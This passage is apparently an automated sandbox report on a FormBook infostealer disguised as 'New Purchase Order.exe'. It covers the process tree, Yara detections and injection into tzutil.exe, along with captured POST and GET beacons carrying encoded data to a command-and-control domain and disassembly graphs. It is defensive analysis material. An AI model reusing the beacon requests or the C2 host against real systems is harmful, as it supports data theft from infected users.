                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.94996254.179.173.60805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:31.707395077 CET1860OUTPOST /y49d/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.taxiquynhonnew.click
                                                        Origin: http://www.taxiquynhonnew.click
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1230
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.taxiquynhonnew.click/y49d/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Data Raw: 49 4e 76 6c 66 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 4e 6b 36 55 65 78 44 31 44 4a 5a 2b 47 63 7a 54 65 31 47 7a 78 59 31 51 62 55 4b 68 67 69 4c 71 4b 6b 45 53 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 77 70 70 79 56 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 4a 7a [TRUNCATED]
                                                        Data Ascii: INvlf=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhIe+xNk6UexD1DJZ+GczTe1GzxY1QbUKhgiLqKkESkzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBNtzTcx/XwppyVvLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVsd7ep8he4G2XKPsCNpb0SSxXQV/OCxEsTRpEr7XVt2SDez3AZRG5xA64kfbllKGGAlO08cU5I9MM56q15C3O4B0ZiX+8P230Yd7d9IMThAkPqerjIWli02qvEDalvwBg/rcavTI83pYFlj9GLvPe81VFZ/GVDhbp738LB5llS5uP0PqJ5MTbd+/PY0fMavd7iAzlfVDMFQW9fIkLZU/T/qwYbRXrClbeP/pXupf/KmgTUSaS6yPGljwjOmt+FHFuXj694953ik7FD+fcBGb8YnjigvMH5yByUeLA+uMzZR+xkWRFOF8tXeahm/3K7dvgELom8OOvjpP0/BEoAgNO7n9PUwB7s/LuQSS/Hgrm/wnPqn2/mYgmi6vpMTf7u+7NENJMzlERepOJWhpHrA8Jd0CmLdILZEYRAggSZphaZzHXwaCtrDcmSOjGnvrs4nfrgReLCD+hqhImMVr0kQETznnflZjtID5z8R9HqolXreJFk+vGBTR9lw6v7MhPw+OsZWS8mAOofJ8tymv76QLfaqIByETFRZEhXTKyrxTfCzd18PqhbOqL7BVGi6qNxmQ6ah/IggummmsFw5fihB8jz9 [TRUNCATED]
                                                        Dec 3, 2024 14:17:33.191500902 CET371INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.94996854.179.173.60805828C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:17:34.443656921 CET542OUTGET /y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.taxiquynhonnew.click
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                        Dec 3, 2024 14:17:35.999140978 CET506INHTTP/1.1 301 Moved Permanently
                                                        Server: openresty
                                                        Date: Tue, 03 Dec 2024 13:17:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Location: https://www.taxiquynhonnew.click/y49d/?INvlf=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDzO8C+ujqQcrInydaZ/WyC6o7IBrA==&afo=JnyH0Z2
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:15:39
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0x440000
                                                        File size:811'008 bytes
                                                        MD5 hash:C4A4FD2E695F61CEFCF6BACD76FD91E5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:08:15:44
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xd50000
                                                        File size:811'008 bytes
                                                        MD5 hash:C4A4FD2E695F61CEFCF6BACD76FD91E5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1945000489.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1946849090.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:08:16:29
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe"
                                                        Imagebase:0x2d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2611853715.0000000003450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:08:16:33
                                                        Start date:03/12/2024
                                                        Path:C:\Windows\SysWOW64\tzutil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                        Imagebase:0x3d0000
                                                        File size:48'640 bytes
                                                        MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2614825871.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2610575297.0000000002680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:08:16:46
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\VNQzzGlLwqmwByFEhHBilcHxFXuLpliuHHUTVRKDPiBIVJ\snpURZzZKgO.exe"
                                                        Imagebase:0x2d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2611954893.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:11
                                                        Start time:08:16:58
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff73feb0000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:12.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:128
                                                          Total number of Limit Nodes:9
                                                          execution_graph 24047 cdd01c 24048 cdd034 24047->24048 24049 cdd08e 24048->24049 24052 4db321c CallWindowProcW 24048->24052 24054 4db53e8 24048->24054 24058 4db53d7 24048->24058 24062 4db6148 24048->24062 24052->24049 24055 4db540e 24054->24055 24056 4db321c CallWindowProcW 24055->24056 24057 4db542f 24056->24057 24057->24049 24059 4db53e4 24058->24059 24060 4db321c CallWindowProcW 24059->24060 24061 4db542f 24060->24061 24061->24049 24064 4db614c 24062->24064 24065 4db61a9 24064->24065 24066 4db3344 CallWindowProcW 24064->24066 24066->24065 24108 d277f0 24111 d277fa 24108->24111 24113 d27d28 24108->24113 24110 d27845 24117 d273c8 24111->24117 24114 d27d2c 24113->24114 24121 d27e38 24114->24121 24118 d273d3 24117->24118 24120 d2a572 24118->24120 24129 d2959c 24118->24129 24120->24110 24123 d27e5f 24121->24123 24122 d27f3c 24123->24122 24125 d27a4c 24123->24125 24126 d28ec8 CreateActCtxA 24125->24126 24128 d28f8b 24126->24128 24130 d295a7 24129->24130 24133 d2961c 24130->24133 24132 d2a89d 24132->24120 24134 d29627 24133->24134 24137 d2964c 24134->24137 24136 d2a97a 24136->24132 24138 d29657 24137->24138 24141 d2966c 24138->24141 24140 d2aa6d 24140->24136 24142 d29677 24141->24142 24143 d2beb1 24142->24143 24146 4db0688 24142->24146 24152 4db0678 24142->24152 24143->24140 24147 4db06a9 24146->24147 24148 4db06cd 24147->24148 24151 4db09c0 10 API calls 24147->24151 24158 4db0948 24147->24158 24163 4db09b1 24147->24163 24148->24143 24151->24148 24153 4db0680 24152->24153 24154 4db06cd 24153->24154 24155 4db0948 CreateWindowExW 24153->24155 24156 4db09b1 10 API calls 24153->24156 24157 4db09c0 10 API calls 24153->24157 24154->24143 24155->24154 24156->24154 24157->24154 24159 4db094c 24158->24159 24160 4db099f 24159->24160 24168 4db1649 24159->24168 24172 4db1668 24159->24172 24160->24148 24164 4db09d0 24163->24164 24165 4db09ed 24164->24165 24166 4db0a70 6 API calls 24164->24166 24167 4db0a60 6 API calls 24164->24167 24165->24148 24166->24165 24167->24165 24169 4db165a 24168->24169 24171 4db15c5 24168->24171 24169->24171 24176 4db1278 24169->24176 24171->24160 24173 4db1690 24172->24173 24174 4db1278 CreateWindowExW 24173->24174 24175 4db16b8 24173->24175 24174->24175 24175->24160 24177 4db1283 24176->24177 24181 4db3490 24177->24181 24187 4db34a0 24177->24187 24178 4db1761 24178->24171 24183 4db34d1 24181->24183 24184 4db35d1 24181->24184 24182 4db34dd 24182->24178 24183->24182 24185 4db42f8 CreateWindowExW 24183->24185 24186 4db42e7 CreateWindowExW 24183->24186 24184->24178 24185->24184 24186->24184 24189 4db35d1 24187->24189 24190 4db34d1 24187->24190 24188 4db34dd 24188->24178 24189->24178 24190->24188 24191 4db42f8 CreateWindowExW 24190->24191 24192 4db42e7 CreateWindowExW 24190->24192 24191->24189 24192->24189 24067 4db59c8 24068 4db59dc 24067->24068 24070 4db59f8 24068->24070 24071 4db09c0 24068->24071 24072 4db09d0 24071->24072 24073 4db09ed 24072->24073 24076 4db0a70 24072->24076 24087 4db0a60 24072->24087 24073->24070 24077 4db0ab6 GetCurrentProcess 24076->24077 24079 4db0b08 GetCurrentThread 24077->24079 24082 4db0b01 24077->24082 24080 4db0b45 GetCurrentProcess 24079->24080 24083 4db0b3e 24079->24083 24081 4db0b7b 24080->24081 24098 4db0c40 24081->24098 24082->24079 24083->24080 24085 4db0bd4 24085->24073 24088 4db0a6c GetCurrentProcess 24087->24088 24090 4db0b08 GetCurrentThread 24088->24090 24091 4db0b01 24088->24091 24092 4db0b3e 24090->24092 24093 4db0b45 GetCurrentProcess 24090->24093 24091->24090 24092->24093 24094 4db0b7b 24093->24094 24097 4db0c40 2 API calls 24094->24097 24095 4db0ba3 GetCurrentThreadId 24096 4db0bd4 24095->24096 24096->24073 24097->24095 24102 4db0cb8 DuplicateHandle 24098->24102 24104 4db0cb0 24098->24104 24099 4db0ba3 GetCurrentThreadId 24099->24085 24103 4db0d4e 24102->24103 24103->24099 24105 4db0cb6 DuplicateHandle 24104->24105 24106 4db0cb4 24104->24106 24107 4db0d4e 24105->24107 24106->24105 24107->24099 24035 4db77d1 24036 4db77e4 24035->24036 24037 4db78ec 24036->24037 24038 4db7842 24036->24038 24042 4db321c 24037->24042 24040 4db789a CallWindowProcW 24038->24040 24041 4db7849 24038->24041 24040->24041 24043 4db3227 24042->24043 24045 4db61a9 24043->24045 24046 4db3344 CallWindowProcW 24043->24046 24046->24045 24193 d2e838 24194 d2e880 GetModuleHandleW 24193->24194 24195 d2e87a 24193->24195 24196 d2e8ad 24194->24196 24195->24194

                                                          Executed Functions

                                                          Function 04DB9B40 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 292 4db9b40-4db9b72 296 4db9b79 292->296 297 4db9b7e-4db9b92 296->297 298 4db9b98 297->298 299 4db9f6e-4db9f75 297->299 298->296 298->299 300 4db9cda-4db9cdf 298->300 301 4db9e39-4db9e47 298->301 302 4db9ef8-4db9eff 298->302 303 4db9b9f-4db9ba3 call 4db8f48 298->303 304 4db9d57-4db9d91 298->304 305 4db9be7-4db9c96 298->305 306 4db9bb6-4db9bd0 call 4db8f58 298->306 307 4db9d06-4db9d25 298->307 316 4db9cea-4db9d01 300->316 322 4db9e49 301->322 323 4db9e50-4db9e64 301->323 308 4db9f0b-4db9f57 call 4dbedf0 302->308 309 4db9f01-4db9f05 302->309 315 4db9ba8-4db9bb4 303->315 311 4db9da9 304->311 312 4db9d93-4db9d99 304->312 367 4db9c9c-4db9cc4 call 4db8f68 305->367 368 4db9f76-4db9f7e 305->368 326 4db9bd9-4db9be5 306->326 332 4db9d3d-4db9d52 call 4db8f78 307->332 333 4db9d27-4db9d2d 307->333 357 4db9f5d-4db9f69 308->357 309->308 319 4db9dab-4db9e08 311->319 312->311 317 4db9d9b-4db9da7 312->317 315->297 316->297 317->319 327 4db9e0f-4db9e34 call 4db8f88 319->327 322->323 335 4db9e80-4db9eb1 323->335 336 4db9e66-4db9e78 323->336 326->297 327->297 332->297 338 4db9d2f 333->338 339 4db9d31-4db9d33 333->339 355 4db9ecd-4db9ee2 call 4db1504 335->355 356 4db9eb3-4db9ec5 335->356 336->335 338->332 339->332 364 4db9ee7-4db9ef3 355->364 356->355 357->297 364->297 372 4db9cc9-4db9cd5 367->372 372->297
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $%q
                                                          • API String ID: 0-3689577991
                                                          • Opcode ID: eb050985aa44b26028dc6b69d1cbd2e9f485fa3c438d20db213517751884167f
                                                          • Instruction ID: 62c011424ae93b1e55e3f0b5825f4b8798099b488c248de9bd15a7fb2f5610a5
                                                          • Opcode Fuzzy Hash: eb050985aa44b26028dc6b69d1cbd2e9f485fa3c438d20db213517751884167f
                                                          • Instruction Fuzzy Hash: EFC18F70B04245CFDB44DFA4C894AAEBBB2FF88300F108999E546AF365DB74E945CB91
                                                          Function 04DB9B31 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 210 4db9b31-4db9b72 214 4db9b79 210->214 215 4db9b7e-4db9b92 214->215 216 4db9b98 215->216 217 4db9f6e-4db9f75 215->217 216->214 216->217 218 4db9cda-4db9cdf 216->218 219 4db9e39-4db9e47 216->219 220 4db9ef8-4db9eff 216->220 221 4db9b9f-4db9ba3 call 4db8f48 216->221 222 4db9d57-4db9d91 216->222 223 4db9be7-4db9bec 216->223 224 4db9bb6-4db9bbd call 4db8f58 216->224 225 4db9d06-4db9d25 216->225 234 4db9cea-4db9d01 218->234 240 4db9e49 219->240 241 4db9e50-4db9e64 219->241 226 4db9f0b-4db9f10 220->226 227 4db9f01-4db9f05 220->227 233 4db9ba8-4db9bb4 221->233 229 4db9da9 222->229 230 4db9d93-4db9d99 222->230 239 4db9bf7 223->239 236 4db9bc2-4db9bd0 224->236 250 4db9d3d-4db9d52 call 4db8f78 225->250 251 4db9d27-4db9d2d 225->251 242 4db9f1b-4db9f44 226->242 227->226 237 4db9dab-4db9e08 229->237 230->229 235 4db9d9b-4db9da7 230->235 233->215 234->215 235->237 244 4db9bd9-4db9be5 236->244 245 4db9e0f-4db9e34 call 4db8f88 237->245 247 4db9bff-4db9c06 239->247 240->241 253 4db9e80-4db9eb1 241->253 254 4db9e66-4db9e78 241->254 270 4db9f4b-4db9f57 call 4dbedf0 242->270 244->215 245->215 258 4db9c11-4db9c19 247->258 250->215 256 4db9d2f 251->256 257 4db9d31-4db9d33 251->257 273 4db9ecd-4db9ed7 253->273 274 4db9eb3-4db9ec5 253->274 254->253 256->250 257->250 262 4db9c23-4db9c2b 258->262 268 4db9c35-4db9c58 262->268 276 4db9c5f-4db9c76 268->276 275 4db9f5d-4db9f69 270->275 278 4db9ede-4db9ee2 call 4db1504 273->278 274->273 275->215 279 4db9c7c-4db9c7e 276->279 282 4db9ee7-4db9ef3 278->282 283 4db9c88-4db9c8c 279->283 282->215 284 4db9c92-4db9c96 283->284 285 4db9c9c-4db9c9f 284->285 286 4db9f76-4db9f7e 284->286 287 4db9caa-4db9cc4 call 4db8f68 285->287 290 4db9cc9-4db9cd5 287->290 290->215
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $%q
                                                          • API String ID: 0-3689577991
                                                          • Opcode ID: 3c30a282abdf1166553a26c2e5d6acc659bf230948626cc472853eb16cad746c
                                                          • Instruction ID: 86ff7e97eccf70ec487ebf3a971dab1a36bc11d95f0fe3fd58b98ff9850d4b10
                                                          • Opcode Fuzzy Hash: 3c30a282abdf1166553a26c2e5d6acc659bf230948626cc472853eb16cad746c
                                                          • Instruction Fuzzy Hash: BDC1B070B04245CFDB04DFA4C894AAEBBB2FF88300F108999E546AF365DB74E945CB91
                                                          Function 04DB3244 Relevance: .3, Instructions: 253COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 340ce61949bd1af1e8ce583a01f2df16c10f1bf1a77572008f05a4f6b1bd7e4f
                                                          • Instruction ID: 1e9ce4268c98d02be1bd15c350489f043447f7ba5930f0d618a427bf9a5785be
                                                          • Opcode Fuzzy Hash: 340ce61949bd1af1e8ce583a01f2df16c10f1bf1a77572008f05a4f6b1bd7e4f
                                                          • Instruction Fuzzy Hash: 14A17F35E00319DFCB05DFA4E8549EDBBBAFF89314F158619E416AB360DB30A941DBA0
                                                          Function 00D20C18 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bce79b215289bf31943a11b7cfec2a7f4db01d523ec35af97e8d2043774ff581
                                                          • Instruction ID: a11293edb0d71b7bcb56bcb6f4f9bf4b60c0ceb0c3fa49036fe78777e1ef3df9
                                                          • Opcode Fuzzy Hash: bce79b215289bf31943a11b7cfec2a7f4db01d523ec35af97e8d2043774ff581
                                                          • Instruction Fuzzy Hash: DB910670E04295CFDB05DF64D88456EFFB2BF56304B1988AAD8119B257C635CC85CBA1
                                                          Function 04DB5530 Relevance: .2, Instructions: 221COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d51178426bc0cbfb76efab0552b9f5e706ba721cc5c7eada8f04a39f26c8eeb5
                                                          • Instruction ID: 0049078d6ed9c2543250f64fadc8070856c29701503716e060486f037e750c0c
                                                          • Opcode Fuzzy Hash: d51178426bc0cbfb76efab0552b9f5e706ba721cc5c7eada8f04a39f26c8eeb5
                                                          • Instruction Fuzzy Hash: B7918035E00319DFCB05DFA4E8549EDBBBAFF89314F158615E416AB360DB30A981DBA0
                                                          Function 00D20D65 Relevance: .2, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f0cf618816688edb0c26804c70d8d36313b432f3fd9612b90b93fd0f4756e2a
                                                          • Instruction ID: 7a7cd035735852dba2c5b5bfb44cd0ce8be253ca237dd8253a2afed07621ee67
                                                          • Opcode Fuzzy Hash: 6f0cf618816688edb0c26804c70d8d36313b432f3fd9612b90b93fd0f4756e2a
                                                          • Instruction Fuzzy Hash: CD812730E05295CFDB05DF64D89466EBFB2BF96304F1688AEE4119B263C634CC45CB62
                                                          Function 00D209BF Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
